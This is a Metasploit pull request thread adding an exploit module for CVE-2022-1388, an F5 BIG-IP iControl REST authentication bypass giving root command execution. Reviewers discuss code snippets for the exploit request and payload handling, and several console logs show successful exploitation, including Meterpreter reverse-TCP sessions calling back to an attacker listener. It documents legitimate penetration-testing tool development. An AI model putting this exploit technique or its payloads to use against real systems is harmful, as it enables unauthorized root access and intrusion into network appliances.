Added module for f5 icontrol RCE (CVE-2022-1388)
rapid7/metasploit-framework pull request #16549
Opened 2022-05-09 23:48 UTC by heyder

Added module for f5 icontrol RCE (CVE-2022-1388)

```
msf6 exploit(linux/http/f5_icontrol_rce) > options 

Module options (exploit/linux/http/f5_icontrol_rce):

   Name           Current Setting      Required  Description
   ----           ---------------      --------  -----------
   Authorization  admin:               yes       Username and Password to be sent in the Authorization header
   Proxies        http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         192.168.111.222      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          443                  yes       The target port (TCP)
   SSL            true                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                    yes       The base path to the iControl installation
   VHOST                               no        HTTP server virtual host

Payload options (cmd/unix/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   whoami           yes       The command string to execute

Exploit target:

   Id  Name
   --  ----
   0   F5 iControl

msf6 exploit(linux/http/f5_icontrol_rce) > run

[+] whoami
[!] AutoCheck is disabled, proceeding with exploitation
[+] root

[*] Exploit completed, but no session was created.
```
- [ ] Add documentation
- [ ] Use other payloads

2022-05-10 13:11 UTC, smcintyre-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +    body = JSON(res.body) if res && res.code == 401
Should use `res.get_json_document` instead of `JSON(res.body)`.

2022-05-10 13:11 UTC, smcintyre-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +      'data' => { command: 'run', utilCmdArgs: " -c '#{payload.encoded}' " }.to_json
I'm 99% sure we're going to want some kind of special escaping for the payload characters here. Some of the payloads will include single quotes which will be a problem here. Either there should be bad chars in the target's payload definition or it should be explicitly handled here via converting to base64 or something.

2022-05-10 13:11 UTC, smcintyre-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        OptString.new('Authorization', [true, 'Username and Password to be sent in the Authorization header', 'admin:'])
As I understand the vulnerability, this header value is part of it. The `HttpUsername` and `HttpPassword` options are typically used to construct the authorization header. Either the value should be hard coded and those options should be deregistered, or the `HttpUsername` should default to `admin` to allow users to leverage this module if they know the credentials.

2022-05-10 13:11 UTC, smcintyre-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +      'uri' => normalize_uri('/mgmt/shared/authn/login'),
Since you registered the `TARGETURI` option, it should be used here if there's some kind of middle layer.

2022-05-10 13:24 UTC, bcoles commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Name' => 'Undisclosed requests may bypass iControl REST authentication',
Module names must include the software name, and optionally include the vulnerable component/parameter/functionality. and usually approximately matches the file name.

Suggest something like this:

* F5 BIG-IP iControl REST Command Execution
* F5 BIG-IP iControl REST Authenticated Command Execution

2022-05-10 13:58 UTC, jvoisin commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Name' => 'Undisclosed requests may bypass iControl REST authentication',
More like `F5 BIG-IP iControl REST Unauthenticated Command Execution` then :P

2022-05-10 14:11 UTC, jvoisin commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +      'version' => '1.1',
No need to specify the version.

2022-05-10 14:11 UTC, jvoisin commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Keep-Alive' => '300',
No need for a `Keep-Alive` header.

2022-05-10 14:11 UTC, jvoisin commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Cache-Control' => 'max-age=0',
Is this header required?

2022-05-10 14:11 UTC, jvoisin commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'X-F5-Auth-Token' => 0,
I *think* that the value of the token can be randomised here.

2022-05-10 14:11 UTC, jvoisin commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +          ['URL', 'https://support.f5.com/csp/article/K23605346']
You might want to add/check out https://twitter.com/jas502n/status/1523611433938059265 :)

2022-05-10 15:26 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        ],
Analysis and/or PoC?

2022-05-10 15:28 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +          ['URL', 'https://support.f5.com/csp/article/K23605346']
Link to analysis and/or PoC used, please.

2022-05-10 15:30 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Arch' => ARCH_CMD,
Does Python Meterpreter work?

2022-05-10 15:33 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'DisclosureDate' => '2022-05-05',
> Original Publication Date: May 04, 2022

?

2022-05-10 15:37 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +    Exploit::CheckCode::Appears if body.key?('message') && body['kind'] == ':resterrorresponse'
```suggestion
    CheckCode::Appears if body.key?('message') && body['kind'] == ':resterrorresponse'
```

2022-05-10 15:40 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Authorization' => "Basic  #{Base64.strict_encode64(datastore['Authorization'])}",
This can be `authorization` in the top-level hash.

2022-05-10 15:44 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Content-Type' => 'application/json'
This can be `ctype` in the top-level hash.

2022-05-10 15:46 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +    fail_with(Failure::UnexpectedReply) unless res.code == 200
```suggestion
    fail_with(Failure::UnexpectedReply) unless res&.code == 200
```

2022-05-10 15:47 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +    print_good JSON(res.body)['commandResult']
https://github.com/rapid7/metasploit-framework/pull/16549/files#r869212370

2022-05-10 15:55 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Arch' => ARCH_CMD,
See #16186.

2022-05-10 15:57 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'DisclosureDate' => '2022-05-05',
See https://support.f5.com/csp/article/K23605346.

2022-05-10 15:57 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Arch' => ARCH_CMD,
Optionally, a `CmdStager` target may be added.

2022-05-10 17:48 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Authorization' => "Basic  #{Base64.strict_encode64(datastore['Authorization'])}",
https://github.com/rapid7/metasploit-framework/pull/16549/files#r869217099

2022-05-10 17:52 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        OptString.new('Authorization', [true, 'Username and Password to be sent in the Authorization header', 'admin:'])
Possibly:

https://github.com/rapid7/metasploit-framework/blob/5a04f8253cbdf04f94b28e30dd89478613c1ee25/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb#L99-L101

2022-05-10 17:55 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Name' => 'Undisclosed requests may bypass iControl REST authentication',
2 iControl 2 Furious, please.

2022-05-10 21:53 UTC, heyder commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Arch' => ARCH_CMD,
> Does Python Meterpreter work?

Not sure. Need to fix some stuff on my setup to test it.

2022-05-10 21:59 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
This isn't checking a version?

2022-05-10 23:28 UTC, heyder commented
```
msf6 exploit(linux/http/f5_icontrol_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(linux/http/f5_icontrol_rce) > options 

Module options (exploit/linux/http/f5_icontrol_rce):

   Name          Current Setting      Required  Description
   ----          ---------------      --------  -----------
   HttpPassword                       yes       iControl password
   HttpUsername  admin                yes       iControl username
   Proxies       http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.111.222      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         443                  yes       The target port (TCP)
   SSL           true                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                    yes       The base path to the iControl installation
   VHOST                              no        HTTP server virtual host


Payload options (cmd/unix/generic):

   Name  Current Setting                Required  Description
   ----  ---------------                --------  -----------
   CMD   whoami; tmsh show sys version  yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/f5_icontrol_rce) > run

[+] whoami; tmsh show sys version
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking 192.168.111.222:443
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/generic
[*] Executing command: whoami; tmsh show sys version
[+] Successfully executed command
root

Sys::Version
Main Package
  Product     BIG-IP
  Version     15.1.3.1
  Build       0.0.18
  Edition     Point Release 1
  Date        Mon Jul 12 23:47:21 PDT 2021


[*] Exploit completed, but no session was created.
```

2022-05-11 12:58 UTC, jvoisin commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Name' => 'F5 BIG-IP iControl REST authentication bypass',
It's an RCE, not only an auth bypass.

2022-05-11 13:30 UTC, heyder commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Name' => 'F5 BIG-IP iControl REST authentication bypass',
I see what you're saying but the whole vulnerability is how to bypass the authentication to reach the `/mgmt/tm/util/bash` endpoint.

2022-05-11 15:07 UTC, gwillcox-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Name' => 'F5 BIG-IP iControl REST authentication bypass',
Should rename this to something like "Authentication Bypass And RCE" in that case, would make more sense to end users.

2022-05-11 16:14 UTC, gwillcox-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Name' => 'F5 BIG-IP iControl REST authentication bypass',
Perhaps "RCE via Authentication Bypass" would reflect this better?

2022-05-11 16:24 UTC, rbowes-r7 commented
A couple quick comments from executing it (keeping in mind I'm not an expert on msf (yet!)):

* This defaults to port 80. In the default configuration, port 80 isn't used - is it possible to default to 443?
* Python Meterpreter works great as a payload

I tested against four hosts, two patched and two vulnerable: 13.1.4.1, 13.1.5, 16.1.2.1, and 16.1.2.2. Exactly as expected, it worked on the two vulnerable:

```
msf6 > use exploits/linux/http/f5_icontrol_rce
[*] Using configured payload cmd/unix/reverse_python_ssl
msf6 exploit(linux/http/f5_icontrol_rce) > set PAYLOAD payload/cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_icontrol_rce) > set RHOSTS 10.0.0.132-135
RHOSTS => 10.0.0.132-135
msf6 exploit(linux/http/f5_icontrol_rce) > set LHOST 10.0.0.123
LHOST => 10.0.0.123
msf6 exploit(linux/http/f5_icontrol_rce) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/f5_icontrol_rce) > exploit
[*] Exploiting target 10.0.0.132

[*] Started reverse TCP handler on 10.0.0.123:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking 10.0.0.132:443
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploiting target 10.0.0.133
[*] Started reverse TCP handler on 10.0.0.123:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking 10.0.0.133:443
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (40132 bytes) to 10.0.0.133
[*] Meterpreter session 1 opened (10.0.0.123:4444 -> 10.0.0.133:33112) at 2022-05-11 09:21:13 -0700
[!] Command execution timed out
[*] Session 1 created in the background.
[*] Exploiting target 10.0.0.134
[*] Started reverse TCP handler on 10.0.0.123:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking 10.0.0.134:443
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (40132 bytes) to 10.0.0.134
[*] Meterpreter session 2 opened (10.0.0.123:4444 -> 10.0.0.134:53064) at 2022-05-11 09:21:18 -0700
[!] Command execution timed out
[*] Session 2 created in the background.
[*] Exploiting target 10.0.0.135
[*] Started reverse TCP handler on 10.0.0.123:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking 10.0.0.135:443
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
msf6 exploit(linux/http/f5_icontrol_rce) > sessions

Active sessions
===============

  Id  Name  Type                      Information                   Connection
  --  ----  ----                      -----------                   ----------
  1         meterpreter python/linux  root @ localhost.localdomain  10.0.0.123:4444 -> 10.0.0.133:33112 (10.0.0.133)
  2         meterpreter python/linux  root @ localhost.localdomain  10.0.0.123:4444 -> 10.0.0.134:53064 (10.0.0.134)

msf6 exploit(linux/http/f5_icontrol_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
```

Works exactly as expected (except having to change the port to 443).

2022-05-11 16:35 UTC, gwillcox-r7 commented
> * This defaults to port 80. In the default configuration, port 80 isn't used - is it possible to default to 443?

Yep we can fix that.

Rest should be good to go then, I can make the necessary change to address the above issue and the naming issue.

2022-05-11 17:35 UTC, gwillcox-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Arch' => ARCH_CMD,
Marking as resolved due to https://github.com/rapid7/metasploit-framework/pull/16549#issuecomment-1123988449 stating this works fine.

2022-05-11 18:22 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Name' => 'F5 BIG-IP iControl REST authentication bypass',
The filename still needs to change, too. It's too generic at the moment.

2022-05-11 18:27 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        },
```suggestion
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
```

2022-05-11 18:29 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        ],
This still needs to link to the PoC.

2022-05-11 18:31 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'References' => [
This still needs to link to the PoC.

2022-05-11 18:34 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'DisclosureDate' => '2022-04-05', # Vendor advisory
This still requires correction:

```suggestion
        'DisclosureDate' => '2022-05-04', # Vendor advisory
```

https://support.f5.com/csp/article/K23605346

2022-05-11 18:42 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
Is this still true?

https://github.com/rapid7/metasploit-framework/blob/110998d67b9f8260e314b9eb04e9bf96f558fd80/modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb#L88

2022-05-11 18:59 UTC, wvu commented
Needs to `include Msf::Exploit::CmdStager`:

```
msf6 exploit(linux/http/f5_icontrol_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[-] Exploit failed: NameError undefined local variable or method `execute_cmdstager' for #<Module:exploit/linux/http/f5_icontrol_rce datastore=[{"RPORT"=>443, "SSL"=>true, "WORKSPACE"=>nil, "VERBOSE"=>false, "PAYLOAD"=>"linux/x64/meterpreter/reverse_tcp", "WfsDelay"=>2, "EnableContextEncoding"=>false, "ContextInformationFile"=>nil, "DisablePayloadHandler"=>false, "RHOSTS"=>"127.0.0.1", "VHOST"=>nil, "Proxies"=>nil, "UserAgent"=>"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36", "HttpUsername"=>"admin", "HttpPassword"=>"", "HttpRawHeaders"=>nil, "DigestAuthIIS"=>true, "SSLVersion"=>"Auto", "FingerprintCheck"=>true, "DOMAIN"=>"WORKSTATION", "HttpClientTimeout"=>nil, "HttpTrace"=>false, "HttpTraceHeadersOnly"=>false, "HttpTraceColors"=>"red/blu", "HTTP::uri_encode_mode"=>"hex-normal", "HTTP::uri_full_url"=>false, "HTTP::pad_method_uri_count"=>1, "HTTP::pad_uri_version_count"=>1, "HTTP::pad_method_uri_type"=>"space", "HTTP::pad_uri_version_type"=>"space", "HTTP::method_random_valid"=>false, "HTTP::method_random_invalid"=>false, "HTTP::method_random_case"=>false, "HTTP::version_random_valid"=>false, "HTTP::version_random_invalid"=>false, "HTTP::uri_dir_self_reference"=>false, "HTTP::uri_dir_fake_relative"=>false, "HTTP::uri_use_backslashes"=>false, "HTTP::pad_fake_headers"=>false, "HTTP::pad_fake_headers_count"=>0, "HTTP::pad_get_params"=>false, "HTTP::pad_get_params_count"=>16, "HTTP::pad_post_params"=>false, "HTTP::pad_post_params_count"=>16, "HTTP::uri_fake_end"=>false, "HTTP::uri_fake_params_start"=>false, "HTTP::header_folding"=>false, "TARGETURI"=>"/", "CmdExecTimeout"=>3.5, "AutoCheck"=>false, "ForceExploit"=>false, "LHOST"=>"127.0.0.1", "LPORT"=>4444, "ReverseListenerBindPort"=>nil, "ReverseAllowProxy"=>false, "ReverseListenerComm"=>nil, "ReverseListenerBindAddress"=>nil, "ReverseListenerThreaded"=>false, "StagerRetryCount"=>10, "StagerRetryWait"=>5, "HandlerSSLCert"=>nil, "CreateSession"=>true, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "CommandShellCleanupCommand"=>nil, "AutoVerifySession"=>true, "target"=>1, "CMDSTAGER::FLAVOR"=>:bourne, "UNPARSED_RHOSTS"=>"127.0.0.1", "AutoLoadStdapi"=>true, "AutoVerifySessionTimeout"=>30, "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "PayloadProcessCommandLine"=>"", "AutoUnhookProcess"=>false, "MeterpreterDebugBuild"=>false, "MeterpreterDebugLogging"=>nil, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependFork"=>false, "PrependSetresuid"=>false, "PrependSetreuid"=>false, "PrependSetuid"=>false, "PrependSetresgid"=>false, "PrependSetregid"=>false, "PrependSetgid"=>false, "PrependChrootBreak"=>false, "AppendExit"=>false, "MeterpreterTryToFork"=>false}]>
Did you mean?  execute_command
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/f5_icontrol_rce) >
```

2022-05-11 19:05 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
This can probably be the new default:

```suggestion
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
```

2022-05-11 19:11 UTC, wvu requested changes
Final pass.

2022-05-11 19:13 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Connection' => 'keep-alive, X-F5-Auth-Token',
(It's definitely not necessary.)

2022-05-11 19:24 UTC, gwillcox-r7 commented
@wvu Can you let us know when you are done with edits? We are also trying to merge some updates to documentation etc as well to improve some explanations 👍 Appreciate you pointing out a few more things here for correction though, looks good!

2022-05-11 19:24 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
(This was the only thing that really stood out from the original module.)

2022-05-11 19:26 UTC, wvu commented
I'm done, but there are outstanding changes to be made.

2022-05-11 19:34 UTC, gwillcox-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'References' => [
I assume this is https://github.com/alt3kx/CVE-2022-1388_PoC, will update this accordingly now.

2022-05-11 19:35 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'Name' => 'F5 BIG-IP iControl REST authentication bypass',
```
wvu@hiigara:~/metasploit-framework:HEAD$ search f5_icontrol modules
modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb
modules/exploits/linux/http/f5_icontrol_exec.rb
modules/exploits/linux/http/f5_icontrol_rce.rb
wvu@hiigara:~/metasploit-framework:HEAD$
```

2022-05-11 19:39 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        Opt::RPORT(443),
We added this to `DefaultOptions` already. Sorry.

2022-05-11 19:42 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +            'Linux Dropper',
[To fix this target.](https://github.com/rapid7/metasploit-framework/pull/16549#issuecomment-1124181712)

2022-05-11 19:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        Opt::RPORT(443),
Resolved in https://github.com/rapid7/metasploit-framework/pull/16549/commits/61f5303fc43631c834dcbe81cdc8b2ddf700a6c8

2022-05-11 19:44 UTC, gwillcox-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +        'References' => [
Resolved in https://github.com/rapid7/metasploit-framework/pull/16549/commits/61f5303fc43631c834dcbe81cdc8b2ddf700a6c8

2022-05-11 19:44 UTC, gwillcox-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +            'Linux Dropper',
Fixed in https://github.com/rapid7/metasploit-framework/pull/16549/commits/61f5303fc43631c834dcbe81cdc8b2ddf700a6c8, awaiting retesting from Ron shortly.

2022-05-11 19:45 UTC, gwillcox-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
@rbowes-r7 We should probably double check this again as well when doing our retest👍

2022-05-11 19:52 UTC, wvu commented
Solid changes. Thanks, all.

2022-05-11 20:37 UTC, rbowes-r7 commented
So messing around with multiple sessions works, but I noticed something odd: after creating a new session, for about 30-60 seconds it seems like no other commands against the REST API work at all, even different endpoints and without using the exploit. It also seems to happen if I test twice consecutively:

```
msf6 exploit(linux/http/f5_icontrol_rce) > exploit

[*] Started reverse TCP handler on 10.0.0.123:4448
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking 10.0.0.133:443
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (40132 bytes) to 10.0.0.133
[*] Meterpreter session 5 opened (10.0.0.123:4448 -> 10.0.0.133:51490) at 2022-05-11 13:35:29 -0700
[!] Command execution timed out

meterpreter >
Background session 5? [y/N]
msf6 exploit(linux/http/f5_icontrol_rce) > set LPORT 4449
LPORT => 4449
msf6 exploit(linux/http/f5_icontrol_rce) > exploit

[*] Started reverse TCP handler on 10.0.0.123:4449
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking 10.0.0.133:443
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
```

It feels like something is waiting for a timeout - maybe the Apache server holds the socket open till it gets a response? In that case, I wonder if backgrounding it could help?

2022-05-11 20:41 UTC, gwillcox-r7 commented
> So messing around with multiple sessions works, but I noticed something odd: after creating a new session, for about 30-60 seconds it seems like no other commands against the REST API work at all, even different endpoints and without using the exploit. It also seems to happen if I test twice consecutively:
> 
> ```
> msf6 exploit(linux/http/f5_icontrol_rce) > exploit
> 
> [*] Started reverse TCP handler on 10.0.0.123:4448
> [*] Running automatic check ("set AutoCheck false" to disable)
> [*] Checking 10.0.0.133:443
> [+] The target is vulnerable.
> [*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
> [*] Sending stage (40132 bytes) to 10.0.0.133
> [*] Meterpreter session 5 opened (10.0.0.123:4448 -> 10.0.0.133:51490) at 2022-05-11 13:35:29 -0700
> [!] Command execution timed out
> 
> meterpreter >
> Background session 5? [y/N]
> msf6 exploit(linux/http/f5_icontrol_rce) > set LPORT 4449
> LPORT => 4449
> msf6 exploit(linux/http/f5_icontrol_rce) > exploit
> 
> [*] Started reverse TCP handler on 10.0.0.123:4449
> [*] Running automatic check ("set AutoCheck false" to disable)
> [*] Checking 10.0.0.133:443
> [-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
> [*] Exploit completed, but no session was created.
> ```
> 
> It feels like something is waiting for a timeout - maybe the Apache server holds the socket open till it gets a response? In that case, I wonder if backgrounding it could help?

Given this is a relatively short time I feel we can probably keep the REPEATABLE_SESSION but note that users may have to wait 1 min between attempts. In most cases this could be attributed to server delays or similar, so I don't think the effect is too bad, but should make users aware.

2022-05-11 20:46 UTC, rbowes-r7 commented
> Given this is a relatively short time I feel we can probably keep the REPEATABLE_SESSION but note that users may have to wait 1 min between attempts. In most cases this could be attributed to server delays or similar, so I don't think the effect is too bad, but should make users aware.

My worry is that it temporarily breaks the REST API for *everyone*. Perhaps not a huge deal, but certainly a side-effect.

2022-05-11 20:49 UTC, wvu commented
I thought that was only me, lol.

2022-05-11 20:51 UTC, gwillcox-r7 commented
> > Given this is a relatively short time I feel we can probably keep the REPEATABLE_SESSION but note that users may have to wait 1 min between attempts. In most cases this could be attributed to server delays or similar, so I don't think the effect is too bad, but should make users aware.
> 
> My worry is that it temporarily breaks the REST API for _everyone_. Perhaps not a huge deal, but certainly a side-effect.

Hmm perhaps CRASH_SERVICE_RESTARTS would be appropriate then, given that it takes the service offline for a bit which given the timing could be considered to be the same as a restart?

2022-05-11 20:53 UTC, rbowes-r7 commented
I also noticed that the `/var/log/audit` file isn't written until I kill the session (which is actually kinda funny re: evasion).

Is it possible to run the command in the background, so the endpoint thinks the execution finished while meterpreter runs in the background? I tried adding a `&` to the end but that didn't work - I imagine there's a better way :)

2022-05-11 20:57 UTC, wvu commented
I can't recall if this is the same issue as in #14935. Hmm.

2022-05-11 20:59 UTC, wvu commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
The comment could use some elaboration if it still holds true.

2022-05-11 21:02 UTC, rbowes-r7 commented
I also noticed that when I run the exploit, I get a warning:

```
[*] Sending stage (3020772 bytes) to 10.0.0.133
[*] Meterpreter session 2 opened (10.0.0.123:4444 -> 10.0.0.133:58790) at 2022-05-11 14:00:17 -0700
[!] Command execution timed out
[*] Command Stager progress - 100.00% done (823/823 bytes)
```

Pretty sure it always happens, "Command execution timed out". I wonder if that's because the HTTPS connection doesn't actually end since the payload hangs the process?

2022-05-11 21:03 UTC, wvu commented
Can you try with the `MeterpreterTryToFork` option set?

2022-05-11 21:04 UTC, gwillcox-r7 commented on modules/exploits/linux/http/f5_icontrol_rce.rb
> +            'Linux Dropper',
Spoke to Ron, confirmed this target is working as expected, marking resolved.

2022-05-11 21:04 UTC, rbowes-r7 commented
> Can you try with the `MeterpreterTryToFork` option set?

That fixes the issue entirely!

2022-05-11 21:13 UTC, rbowes-r7 commented
Working with @gwillcox-r7, it looks like `set PrependFork true` fixes `shell/reverse_tcp`.

These are largely cosmetic - it avoids a warning, and avoids stalling the service for $timeout. But if it doesn't work, it's not the end of the world.

2022-05-11 21:14 UTC, wvu commented
Nevermind, the module is already using `CmdExecTimeout` set to `3.5` by default.

2022-05-11 21:20 UTC, wvu commented
FWIW, other `cmd/unix` payloads may still block the service. There isn't a universal solution to this in Metasploit. Oh well.

2022-05-11 21:24 UTC, wvu commented
`CmdStager` has `background: true`, but yeah... it's a sticky problem.

2022-05-11 21:25 UTC, wvu commented
You can definitely employ all these solutions at once, lol.

2022-05-11 21:40 UTC, wvu commented
> > Given this is a relatively short time I feel we can probably keep the REPEATABLE_SESSION but note that users may have to wait 1 min between attempts. In most cases this could be attributed to server delays or similar, so I don't think the effect is too bad, but should make users aware.
> 
> My worry is that it temporarily breaks the REST API for _everyone_. Perhaps not a huge deal, but certainly a side-effect.

What are you talking about? iControl REST is the most robust service ever implemented.

2022-05-11 21:45 UTC, gwillcox-r7 commented
Once tests pass I'll land this.

2022-05-11 22:16 UTC, wvu commented
> Perfect is the enemy of good.

:shipit:

2022-05-11 23:07 UTC, merged

2022-05-11 23:09 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.

2022-05-11 23:30 UTC, wvu commented
Nicely done, y'all. Thank you, @heyder. :)

2022-05-12 04:53 UTC, heyder commented
Thank you all, it was really a community work.